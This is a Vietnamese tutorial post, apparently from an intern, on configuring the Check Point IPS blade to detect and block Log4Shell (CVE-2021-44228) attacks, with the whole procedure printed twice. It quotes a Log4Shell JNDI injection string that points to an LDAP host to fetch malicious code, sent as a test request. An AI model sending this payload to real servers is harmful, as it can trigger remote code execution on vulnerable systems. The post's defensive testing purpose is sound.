Trình Khôi Nguyên
Intern
Cấu hình tính năng IPS ngăn chặn các cuộc tấn công
Đầu tiên ta vào SmartConsole, tại Gateways & Servers ở phần General Properties, ta nhìn xuống phía dưới chọn Threat Prevention chọn IPS
Tiếp đến ta sẽ cập nhật lại database mới nhất từ ThreatCloud, ở tab Security Policies → chọn Custom Policy → nhìn xuống phía dưới có Custom policy Tools → chọn Update, nhìn sang thấy Blade IPS nhấn Update Now để tiến hành Update
Tiếp đến ta sẽ sử dụng Protection Log4j, Log4j là cơ chế IPS phát hiện và ngăn chặn các cuộc tấn công khai thác lỗ hổng Log4Shell (CVE-2021-44228) trong thư viện Apache Log4j, Security Policies → Custom policy Tools chọn Protections, và tìm kiếm Log4j, ta sẽ double click vào Apache Log4j Remote Code Execute over Non - Standard Port
Một hộp thoại của Protection Detail sẽ hiện lên, tại mục Override Setting chỗ Action chuyển sang Prevent, Track chọn log và bật Capture Packets lên.
Tại máy Client ta sẽ Thực hiện gửi HTTP request chứa chuỗi khai thác Log4Shell ${jndi:ldap://10.120.170.250/malicous_code} từ máy Windows đến máy chủ. Kết quả, request bị hủy/chặn (The request was canceled), cho thấy cơ chế IPS đã phát hiện và ngăn chặn chuỗi tấn công Log4j.
Đầu tiên ta vào SmartConsole, tại Gateways & Servers ở phần General Properties, ta nhìn xuống phía dưới chọn Threat Prevention chọn IPS
Tiếp đến ta sẽ cập nhật lại database mới nhất từ ThreatCloud, ở tab Security Policies → chọn Custom Policy → nhìn xuống phía dưới có Custom policy Tools → chọn Update, nhìn sang thấy Blade IPS nhấn Update Now để tiến hành Update
Tiếp đến ta sẽ sử dụng Protection Log4j, Log4j là cơ chế IPS phát hiện và ngăn chặn các cuộc tấn công khai thác lỗ hổng Log4Shell (CVE-2021-44228) trong thư viện Apache Log4j, Security Policies → Custom policy Tools chọn Protections, và tìm kiếm Log4j, ta sẽ double click vào Apache Log4j Remote Code Execute over Non - Standard Port
Một hộp thoại của Protection Detail sẽ hiện lên, tại mục Override Setting chỗ Action chuyển sang Prevent, Track chọn log và bật Capture Packets lên.
Tại máy Client ta sẽ Thực hiện gửi HTTP request chứa chuỗi khai thác Log4Shell ${jndi:ldap://10.120.170.250/malicous_code} từ máy Windows đến máy chủ. Kết quả, request bị hủy/chặn (The request was canceled), cho thấy cơ chế IPS đã phát hiện và ngăn chặn chuỗi tấn công Log4j.
Bài viết liên quan
Được quan tâm
Bài viết mới